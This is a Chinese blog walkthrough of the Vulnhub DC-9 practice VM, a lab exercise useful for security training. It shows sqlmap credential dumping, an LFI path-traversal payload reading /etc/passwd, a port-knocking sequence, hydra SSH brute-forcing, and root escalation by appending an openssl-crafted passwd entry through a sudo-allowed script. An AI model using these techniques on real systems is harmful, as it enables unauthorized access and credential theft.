Vulnhub[DC9]

最新推荐文章于 2024-06-28 08:38:55 发布
最新推荐文章于 2024-06-28 08:38:55 发布
阅读量768 收藏
点赞数
分类专栏: Vulnhub 文章标签: 安全 学习 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Townmacro/article/details/125684078
版权

简介

下载

  • DC-9.zip (Size: 700 MB)
  • Download: http://www.five86.com/downloads/DC-9.zip
  • Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip
  • Download (Torrent): https://download.vulnhub.com/dc/DC-9.zip.torrent ( Magnet)

信息收集

主机探活

kali中使用arp-scan进行主机探活

arp-scan --interface eth0 192.168.0.0/24

经过筛选可以知道192.168.0.155是DC-9的ip

端口扫描

nmap  -sC -sV -p- 192.168.0.155

发现这里开了80端口,22被策略保护处于关闭状态

首先从80端口入手

翻看页面能发现有一个搜索页面

渗透

看到搜索页面sql注入的感觉就来了

复制数据包直接SQLmap冲

sqlmap -r post.txt --dbs
sqlmap -r post.txt -D Staff --tables 
sqlmap -r post.txt -D Staff -T Users --columns
sqlmap -r post.txt -D Staff -T Users -C Username,Password --dump --batch

最后得到admin账号和密码(admin / transorbital1)

但是登录后台之后好像并没有什么用

最后找到的是文件包含漏洞

在登录之后的manage页面和新出现的页面的下方出现了

File does not exist

文件不存在?

尝试一下payload

?file=../../../../../../../etc/passwd

成功读文件,确认存在LFI

但是这也这是读取一些文件,不能getshell

然后因为在之前爆破数据库的时候还可以看到存在一个users的数据库

sqlmap -r post.txt -D users --tables
sqlmap -r post.txt -D users -T UserDetails --columns
sqlmap -r post.txt -D users -T UserDetails -C username,password --dump --batch

然后我们可以看一下/proc/sched_debug文件,这里是记录的调度器的信息

然后可以在返回信息里找到konckd

端口保护之端口敲门

大致就是按一定的顺序访问端口可以达到开启和关闭某个端口的机制

包含/etc/konckd.conf可以查看端口敲门的策略

依次nc这三个端口

nc 192.168.0.155 7469
nc 192.168.0.155 8475
nc 192.168.0.155 9842

然后nmap就能发现22端口打开了

然后用hydra和之前users数据库中的用户名和密码进行爆破

得到三个用户

然后都ssh登录进去看看

然后是在janitor用户中找到了一个隐藏文件夹.secrets-for-putin

里面是一文件有一些新的密码

把这些密码加到之前的密码本里再次进行爆破

这里又爆出一个新的用户

shh登录

提权

然后列出权限

执行发现是python文件

用find查找test.py

大致意思来说的话就是将参数1的内容写到参数2

使用openssl 创建一个admin的账号

openssl passwd -1 -salt admin 123456

然后修改成passwd中的格式写到/tmp目录下

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

然后运行test 使用命令:sudo ./test /tmp/passwd.txt /etc/passwd

再查看一下/etc/passwd

可以发现新增了一条我们自己写得记录

然后su 切换admin 用户

现在可以发现已经是root权限了

找flag

Townmacro
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2038
vulnhub靶场渗透练习详解——DC9
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
VulnHub DC9
baynk的博客
05-22 487
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-9,412/ 下载地址2:https://pan.baidu.com/s/1p0W0zT5JUG8wsHIgdOaw2w 提取码: 4cx3 啥都没提示,就一个flag 开肝 0x01 渗透流程 nmap走起 这次的22还是filter状态,只能走80了 怎么看着还像drupal啊,怕了怕了,点了一会,Display All Records显示了所有用户的信息 search这里则可以搜索用户名信息。
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 943
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
Vulnhub DC-9
Pai_Space
04-11 3097
明确:《中华人民共和国网络安全法》 Description DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skill..
vulnhub DC9 靶场练习
鸥鹭忘机
09-05 1802
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置->NAT模式->
vulnhub dc9渗透
qq_45455136的博客
07-12 131
dc9靶场渗透 信息收集 SQL注入获取数据 网站后台LFI利用 Hydra爆破SSH密码 SSH登录进行提权
vulnhubDC9
qq_54030686的博客
06-24 1062
vulnhubDC9这应该是DC系列的最后一篇,相较于其他靶机而言,会比较难一些,提权的方式也较为多样,本文参考 下面的是官方出的wp,上面为一位师傅写的,简述一些流程主机发现,端口扫描 主机开放了22和80端口,但是22端口为过滤状态,无法进行暴力破解 对80端口开放的服务进行指纹识别,这里使用whatweb,棱洞之类也可以 并未识别到网站使用的框架,只能够自己进行检测,这里使用burp和xray联合进行检测,具体操作方法这里不再进行描述, 经过检测,发现result.php界面存在sql注入,但是
VulnHub DC3
baynk的博客
05-16 279
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-32,312/ 下载地址2 dc-3.2:https://pan.baidu.com/s/1LyKZbgQiQsSqpMlY8kNUBw 提取码: z4pv 下载地址3 dc-3:https://pan.baidu.com/s/1lt3ek4ra2jHbR4HVEyrk7g 提取码: j8cg 只有一个flag了,同时也只有一个切入点,而且官网上DC3好像升到了DC3-2,不知道到和以前的区别大不大,我这里就
vulnhub dc1
qq_55992895的博客
07-06 841
下载地址1:https://www.vulnhub.com/entry/dc-1,292/下载地址2:https://pan.baidu.com/s/15CUDP2252c_1NFzMOWUKvQ 提取码: md7x打开靶机先用nmap 扫描nmap -sN -T4 192.168.167.0/24 因为局域网内开启的主机比较多扫出了很多IP粗略看一下,有一台开放端口比较多的IP:192.168.167.42nmap -sV 192.168.167.42开启了22 80 111端口也确定这就是靶机后开始
vulnhub靶机DC1
weixin_52450702的博客
10-29 912
靶机DC1IP:192.168.70.160。
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
人工智能给文化安全带来挑战
最新发布
yzf060109的专栏
06-28 464
算法是自动学习、自动决策的技术,但这并不意味着算法是“技术中立”的,算法的使用者、运营者赋予一定的目标从而发挥其效用。由于“信息茧房”中的信息是同质化的,人们的思维和观点也会变得封闭和单一。通过模仿名人或权威人士的言论和行为,“深度伪造”技术不仅可能损害他们的名誉,还能捏造出从未发生过的事件或情境,造成公众对实际发生事件的误解,并可能引发诽谤、欺诈和社会恐慌等一系列问题。由于算法技术的复杂性和专业性,加之公共权力机构在授权和监管上的不足,以及当前对于算法治理手段的相对落后,这种算法驱动的权力正在迅速扩张。
内容安全复习 8 - 视觉内容伪造与检测
infinity_heaven的博客
06-22 1152
人脸检测。
JVM常用概念之安全
nanxiaotao的博客
06-25 897
那么 JVM 如何让所有线程进入安全点状态?问题在于将线程暂停在已知状态,而不仅仅是中断它。为了实现此目标,如果观察到“安全点标志”,JVM 会让 Java 线程在方便的位置自行暂停。
自主可控的芯片设计供应链软件:保障芯片产业安全的关键
YouyuanXway的博客
06-27 397
在当前的科技浪潮中,芯片作为信息技术的核心,其设计、制造和供应链的安全性和自主可控性显得尤为重要。而自主可控的芯片设计供应链软件,正是保障这一产业链安全的关键环节。
DC使用全书(Design_Compiler).doc
09-02
DC使用全书(网友总结的DC资料) DC使用全书(Design_Compiler).doc (925.5 KB, 下载次数: 149 )

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值